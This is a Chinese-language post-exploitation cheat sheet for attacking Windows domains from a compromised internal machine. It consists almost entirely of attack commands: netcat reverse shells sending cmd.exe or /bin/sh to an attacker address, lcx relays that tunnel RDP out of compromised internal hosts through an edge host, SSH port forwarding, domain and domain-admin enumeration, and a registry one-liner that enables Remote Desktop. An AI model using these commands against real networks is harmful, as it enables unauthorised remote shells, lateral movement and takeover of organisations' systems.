后渗透之内网信息收集
内网域渗透的先决条件
首先你要能拿下一台域内的机器,然后才能开始域渗透。道理很简单,就不啰嗦了。介绍一些windows反弹shell的方法:
.\nc.exe -e cmd.exe 192.168.1.1 4444
.\nc 192.168.1.1 4444 -e /bin/sh
nc -l 4444 -vvv
内网穿外网
方案一 正想开口等连接
.\lcx.exe -slave 192.168.10.100 4444 192.168.20.201 3389 #192.168.20.201为内网肉机,192.168.10.100是边界肉机
.\lcx.exe -listen 4444 8888 #在边界肉机上
mstsc 192.168.10.100 8888 #在攻击者主机上
方案二 返向直接连回去
木马会连地址20.20.20.10 #在内网肉机配置木马,反连20.20.20.10是边界肉机,上线端口8888
.\lcx.exe -listen 4444 8888 #在边界肉机上
.\lcx.exe -slave 20.20.20.10 4444 127.0.0.1 4444 #在攻击者主机上
关于ssh端口转发
ssh -C -f -N -g -L 55555:127.0.0.1:8080 a003797@127.0.0.1 #本地端口(55555)到目标地址(127.0.0.1)的目标端口(8080),后面是必须ssh到对方应该是对段的username@IP地址
ssh -C -f -N -g -R 55555:127.0.0.1:8080 a003797@127.0.0.1 #目标地址(127.0.0.1)的目标端口(8080)到本地端口(55555),后面是必须ssh到对方应该是对段的username@IP地址
ssh -C -f -N -g -D listen_port user@Tunnel_Host #不常用,动态监测
最后配置ssr代理
不详细介绍
域渗透的信息收集
查询本机信息
C:\Windows\system32>fsutil.exe fsinfo drives #查询盘符信息
C:\Windows\system32>systeminfo #查询系统信息
C:\Windows\system32>ipconfig /all #查询网络信息
查询域信息
C:\Windows\system32>net view /domain#查询域
C:\Windows\system32>net group /domain #查询组
C:\Windows\system32>net user /domain #查询域用户
C:\Windows\system32>net group “domain admins” /domain #查询域管信息
C:\Windows\system32>net group "domain computer" /domain #查询域内机器信息
查看网络、服务、进程信息
C:\Windows\system32>netstat -anb -p tcp#查询网络服务及PID
C:\Windows\system32>tasklist #查看进程信息
C:\Windows\system32>taskkill /f /im process-name #杀掉进程
一键开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f